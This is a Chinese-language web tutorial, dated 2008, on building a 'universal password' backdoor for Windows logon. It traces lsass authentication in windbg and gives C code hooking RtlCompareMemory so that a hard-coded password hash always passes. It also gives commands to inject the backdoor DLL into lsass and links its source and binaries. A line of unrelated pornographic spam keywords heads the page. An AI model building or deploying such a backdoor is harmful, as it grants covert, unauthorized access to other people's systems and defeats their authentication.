亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

教你利用IAT hook實(shí)現(xiàn)windows通用密碼后門

互聯(lián)網(wǎng)   發(fā)布時(shí)間:2008-10-08 19:03:55   作者:佚名   我要評(píng)論
先不管是不是真的有,我們可以自己實(shí)現(xiàn)一個(gè)這樣的后門。 先簡(jiǎn)單介紹一下windows登陸過(guò)程中的一些過(guò)程。 winlogon進(jìn)程用gina.dll獲取用戶名和密碼,通過(guò)LPC傳給lsass進(jìn)程。 然后lsass進(jìn)程調(diào)用默認(rèn)認(rèn)證包msv1_0.dll來(lái)驗(yàn)證密碼的對(duì)錯(cuò)。 而msv1_0則從SAM中獲得用戶
先不管是不是真的有,我們可以自己實(shí)現(xiàn)一個(gè)這樣的后門。

先簡(jiǎn)單介紹一下windows登陸過(guò)程中的一些過(guò)程。
winlogon進(jìn)程用gina.dll獲取用戶名和密碼,通過(guò)LPC傳給lsass進(jìn)程。
然后lsass進(jìn)程調(diào)用默認(rèn)認(rèn)證包msv1_0.dll來(lái)驗(yàn)證密碼的對(duì)錯(cuò)。
而msv1_0則從SAM中獲得用戶的信息,包括密碼的哈希。

要實(shí)現(xiàn)這樣一個(gè)后門,首先要找到登陸驗(yàn)證這一系列函數(shù)的最底層的一個(gè),然后在那里做手腳。
很明顯,這個(gè)最底層的函數(shù)在lsass進(jìn)程的msv1_0.dll模塊中。

lsass調(diào)用msv1_0.dll的是這個(gè)函數(shù):

代碼:
msv1_0!LsaApLogonUserEx2

LsaApLogonUserEx2 in MSDN

那我們就應(yīng)該調(diào)試lsass進(jìn)程然后在msv1_0!LsaApLogonUserEx2下斷點(diǎn)。
這里我使用windbg和vmware并利用dbgsrv進(jìn)行遠(yuǎn)程的用戶態(tài)調(diào)試。
http://blogs.msdn.com/spatdsg/archiv…27/507265.aspx
上面Spat在blog中介紹了如何用dbgsrv調(diào)試(Debugging LSA via dbgsrv.exe)。
在虛擬機(jī)(被調(diào)試端)運(yùn)行

代碼:
dbgsrv.exe -t tcp:port=1234,password=spat

然后在調(diào)試端運(yùn)行

代碼:
windbg.exe -premote tcp:server=192.168.1.102,port=1234,password=spat

然后選擇附加lsass進(jìn)程。
但這里我們不能登陸之后再運(yùn)行dbgsrv,那樣dbgsrv就被關(guān)掉了,所以我利用windows的任務(wù)計(jì)劃讓dbgsrv開(kāi)機(jī)就運(yùn)行起來(lái)。

虛擬機(jī)啟動(dòng)后,dbgsrv也起來(lái)了,然后用windbg連上并附上lsass進(jìn)程。
在下了斷點(diǎn)msv1_0!LsaApLogonUserEx2后,讓lsass繼續(xù)運(yùn)行。
然后登陸,果然windbg斷下來(lái)了。

這個(gè)時(shí)候給大家介紹windbg的一個(gè)強(qiáng)勁的命令,那就是wt,它能所有的記錄函數(shù)調(diào)用關(guān)系,一直記錄到ret,具體用法請(qǐng)看windbg幫助。
我猜wt是單步運(yùn)行,所以很慢。
但是wt輸出的文本很多,太難看了,于是我寫了個(gè)python腳本把wt的輸出轉(zhuǎn)成一個(gè)TreeCtrl

大家注意看我鼠標(biāo)點(diǎn)上的那個(gè)函數(shù):ntdll!RtlCompareMemory。
經(jīng)過(guò)調(diào)試我發(fā)現(xiàn)這個(gè)函數(shù)就是我要找的那個(gè)“最底層的函數(shù)”。

代碼:
SIZE_T
RtlCompareMemory(
IN CONST VOID *Source1,
IN CONST VOID *Source2,
IN SIZE_T Length
);

RtlCompareMemory in MSDN
并且我還發(fā)現(xiàn)了驗(yàn)證密碼時(shí)這個(gè)函數(shù)3個(gè)參數(shù)的細(xì)節(jié),
Source1是從SAM中取出的用戶密碼的Unicode形式的md4哈希,
Source2是用戶輸入的密碼的Unicode形式的md4哈希,
Length總是16,因?yàn)閙d4的哈希就是16位。
很容易我寫出了下面這個(gè)替代的函數(shù):

代碼:
int WINAPI MyRtlCompareMemory(void *a, void *b, int len) {
if (len == 16 && pRtlCompareMemory(PASSWD_HASH, b, len) == 16)
return 16;
return pRtlCompareMemory(a, b, len);
}

其中pRtlCompareMemory是全局變量,是真正的RtlCompareMemory的地址,PASSWD_HASH是通用密碼的哈希。
使用MyRtlCompareMemory來(lái)hook掉RtlCompareMemory,就可以實(shí)現(xiàn)預(yù)定的功能了。
如果要比較的是16位的,并且第二段內(nèi)存與我們的哈希一樣那就直接放行,不管第一段內(nèi)存是什么。
也許有朋友會(huì)問(wèn),你這是hook了msv1_0模塊內(nèi)所有調(diào)用RtlCompareMemory的地方,不會(huì)出錯(cuò)嗎?
放心吧,哪有那么巧,要比較的是16位的而且第二段內(nèi)存又和我們的哈希一模一樣?

要hook這個(gè)函數(shù)有很多方法,
我選擇了最懶的一種,IAT hook dll注入。
于是我寫了一個(gè)小工具來(lái)注入dll:DllInject

代碼:
C:\Documents and Settings\cly\桌面\bin>InjectDll.exe
InjectDll v0.1
Inject/UnInject a dll file to a process, by cly, at 20080522
Usage:
InjectDll.exe (-i | -u | -U) pid filename
-i: Inject
-u: UnInject once
-U: UnInject at all

passdoor.dll是要注入到lsass進(jìn)程的dll,這個(gè)dll在DllMain中實(shí)現(xiàn)了IAT hook,很土的技術(shù)了,就不貼代碼了,網(wǎng)上一搜一籮筐。

然后我又寫了一個(gè)小工具:pdconfig
其實(shí)就是改passdoor.dll中的哈希,以免要換密碼是又要重新編譯passdoor.dll。

使用方法:

代碼:
InjectDll.exe -i pid_of_lsass full_path_of_passdoor.dll

卸載方法:

代碼:
InjectDll.exe -U pid_of_lsass full_path_of_passdoor.dll

http://clyfish.googlepages.com/passdoor.rar
這里是本文中相關(guān)工具的源碼以及編譯好的二進(jìn)制文件。
其中包括InjectDll.exe, passdoor.dll和pdconfig.exe,所有代碼均使用MingW gcc4.2.1編譯。

相關(guān)文章

最新評(píng)論